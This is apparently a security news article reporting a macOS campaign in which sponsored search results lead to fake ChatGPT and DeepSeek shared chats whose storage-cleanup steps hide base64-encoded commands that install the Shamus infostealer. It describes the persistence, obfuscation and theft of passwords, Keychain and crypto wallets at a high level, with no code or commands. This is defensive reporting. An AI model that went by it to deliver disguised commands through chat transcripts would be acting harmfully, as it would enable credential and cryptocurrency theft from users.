A new malware campaign has emerged that exploits legitimate AI platforms to deliver malicious code directly to unsuspecting users.
Threat actors are using sponsored Google search results to redirect users searching for common macOS troubleshooting tips, such as “how to clear storage on Mac,” to fake ChatGPT and DeepSeek shared chat links.
These shared chats appear to provide helpful system instructions but actually contain hidden malicious commands designed to compromise the target system.
The attack begins when users encounter a seemingly legitimate shared chat that provides step-by-step instructions for clearing storage space on their Mac.
However, embedded within these instructions are base64-encoded commands that, when executed, download and run a sophisticated multi-stage malware program.
Google Search (Source – Breakpoint Security)
This technique is clever because it bypasses the safety checks these AI platforms typically employ, allowing attackers to deliver targeted, malicious instructions directly to users through official channels.
The infection process starts with a bash script that prompts users to enter their system password, masquerading as a credential verification prompt.
Once captured, the malware uses this password to escalate privileges and download the main malware binary from attacker-controlled servers.
Breakpoint Security security analysts identified this sample as Shamus, a known information stealer and cryptocurrency thief that has been widely documented in security communities.
Sophisticated tactic
The malware’s sophistication lies in its multi-layered encoding and detection evasion tactics.
Reddit Post (Source – Breakpoint Security)
It uses arithmetic and XOR encoding combined with a custom 6-bit decoder to hide its malicious code from analysis tools.
This obfuscation makes it extremely difficult for security researchers to identify its true functionality through static analysis alone.
Once installed, the malware establishes persistent system access by creating a LaunchDaemon that runs automatically at startup.
This ensures the malware maintains access even after the user restarts their computer. The core functionality targets sensitive data across multiple categories, including browser cookies and passwords from Chrome, Firefox, and 12 other Chromium-based browsers.
Deepseek Post (Source – Breakpoint Security)
The threat extends to cryptocurrency wallets, with the malware specifically targeting 15 different desktop and hardware wallet applications, including Ledger Live, Trezor Suite, Exodus, Coinomi, Electrum, and Bitcoin Core.
Additionally, the malware steals the entire macOS Keychain database, Telegram session data, VPN profiles, and files from the desktop and Documents folders.
After collection, all stolen data is compressed and transmitted to the attacker’s command-and-control servers using encrypted communications.
This campaign represents a sophisticated evolution in malware distribution, demonstrating how threat actors continue to find new ways to bypass security measures and compromise user systems.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Hackers Leveraging LLM Shared Chats to Steal Your Passwords and Crypto appeared first on Cyber Security News.
